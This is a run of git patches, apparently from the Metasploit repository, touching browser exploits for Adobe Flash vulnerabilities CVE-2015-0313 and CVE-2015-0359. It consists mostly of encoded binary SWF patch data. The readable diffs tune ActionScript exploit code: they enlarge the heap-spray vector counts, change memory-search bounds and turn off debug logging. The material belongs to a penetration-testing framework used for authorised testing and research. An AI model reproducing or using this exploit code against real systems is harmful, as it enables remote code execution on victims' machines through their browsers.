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
E9VOtHBme*a

diff --git a/external/source/exploits/CVE-2015-0313/Exploit.as b/external/source/exploits/CVE-2015-0313/Exploit.as
index 07269d38f1..e66e59e9a6 100755
--- a/external/source/exploits/CVE-2015-0313/Exploit.as
+++ b/external/source/exploits/CVE-2015-0313/Exploit.as
@@ -52,13 +52,10 @@ public class Exploit extends Sprite
 
         ba.length = 0x1000
         ba.shareable = true
-		Logger.log("spray")
         for (var i:uint = 0; i < ov.length; i++) {
             ov[i] = new Vector.<uint>(1014)
             ov[i][0] = 0xdeedbeef
-			ov[i][1] = 0xdeadbeef
         }
-		Logger.log("holes")
         for (i = 0; i < 70000; i += 2) {
 			delete(ov[i])
 		}
@@ -68,7 +65,6 @@ public class Exploit extends Sprite
         worker.setSharedProperty("mc", mc)
         worker.setSharedProperty("ba", ba)
         ApplicationDomain.currentDomain.domainMemory = ba
-		Logger.log('go')
         worker.start()
     }
 
diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
index ebbf9649fa..c34fab31f3 100644
--- a/external/source/exploits/CVE-2015-0313/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -24,7 +24,7 @@ package
         private var payload_address:uint 
         private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
         private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
-        private var spray:Vector.<Object> = new Vector.<Object>(15000)
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
 
         public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
         {
@@ -54,18 +54,18 @@ package
             Logger.log("[*] Exploiter - spray_objects()")
             for (var i:uint = 0; i < spray.length; i++) 
             {
-                spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
                 spray[i][0] = eba.ba
-                spray[i][1] = exploit 
-                spray[i][2] = stack
-                spray[i][3] = payload_space
+				spray[i][1] = exploit 
+				spray[i][2] = stack
+				spray[i][3] = payload_space
             } 
         }
         
         private function search_objects():uint
         {
             Logger.log("[*] Exploiter - search_objects()")
-            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0x8000)
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
             return idx + 1
         }
 
diff --git a/external/source/exploits/CVE-2015-0313/Logger.as b/external/source/exploits/CVE-2015-0313/Logger.as
index 61ec768c25..16c0447973 100644
--- a/external/source/exploits/CVE-2015-0313/Logger.as
+++ b/external/source/exploits/CVE-2015-0313/Logger.as
@@ -3,7 +3,7 @@ package
     import flash.external.ExternalInterface
 
     public class Logger {
-        private static const DEBUG:uint = 1
+        private static const DEBUG:uint = 0
  
         public static function alert(msg:String):void
         {

From 0d2454de934be8d606b2ffc6765534ec098f0d3d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 12:27:52 -0500
Subject: [PATCH 0387/1013] Fix indentation

---
 external/source/exploits/CVE-2015-0313/Exploiter.as | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/external/source/exploits/CVE-2015-0313/Exploiter.as b/external/source/exploits/CVE-2015-0313/Exploiter.as
index c34fab31f3..0a971409f6 100644
--- a/external/source/exploits/CVE-2015-0313/Exploiter.as
+++ b/external/source/exploits/CVE-2015-0313/Exploiter.as
@@ -55,7 +55,7 @@ package
             for (var i:uint = 0; i < spray.length; i++) 
             {
 				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
-                spray[i][0] = eba.ba
+				spray[i][0] = eba.ba
 				spray[i][1] = exploit 
 				spray[i][2] = stack
 				spray[i][3] = payload_space

From 6c7ee105206d1a0eacf21c57bd9a2404760305f4 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 10 Jun 2015 13:50:43 -0500
Subject: [PATCH 0388/1013] Update to use the new flash Exploiter

---
 data/exploits/CVE-2015-0359/msf.swf           | Bin 18236 -> 20979 bytes
 .../source/exploits/CVE-2015-0359/Exploit.as  | 123 ++++++++
 external/source/exploits/CVE-2015-0359/Msf.as | 264 ------------------
 .../browser/adobe_flash_domain_memory_uaf.rb  |  19 +-
 4 files changed, 134 insertions(+), 272 deletions(-)
 create mode 100755 external/source/exploits/CVE-2015-0359/Exploit.as
 delete mode 100755 external/source/exploits/CVE-2015-0359/Msf.as

diff --git a/data/exploits/CVE-2015-0359/msf.swf b/data/exploits/CVE-2015-0359/msf.swf
index e7244c61f27d7c127efbf8b544cf6428964b6f95..cd880de1e3d5a4c6153860de72c8d9701a8bbbd4 100755
GIT binary patch
delta 20861
zcmV(tK<vM~jsf$d0Sa1IQygj10081qu?i#se-rkwMYN>KM+vhWi}Ir13z3>QlrbC^
zmH5R67ArGYIC_jd$RaRq5KPigV@$?3FI{}k(zHBDtSQsci=~K!?@*99kJI?-CeOc9
z<1Pd1Tr{c^JK|7pl#(-^CmJ~Jl19L~JxMga8&s79K@LD-CgkvvuXG<OIP6Ny5+-X>
ze-!*mz=#ntoe7RT>Eb{nY0T%BH(r})O+Yo#SdA{{9{<Bz?N!AL9X3S5ja$e4{$O3g
zft@!&4|k%a-r7*oWd?jcMuf|ZrkCE|JUvCJ)5)QNR?|8k!rDnC%a&Svf@qWR7rU46
zpyk~L$9!}k&036F)Fy$PwWuSR<}gH>f42r-%fGk#83Dvc*+GyovNgH(Z|d!QCDR;>
zXRJrls$F>n3ODegxh)I=W8My!1?Db;%mj)8>Bd$I2y^(#Zs7O0sERqjQ(Z|g$BV1s
zh7cb#<Q)o)jSatLpVpYAa-NubDm<Ug5ee~3b#Ne?9-GH_j`FwIX45Xo(VbS;e?<un
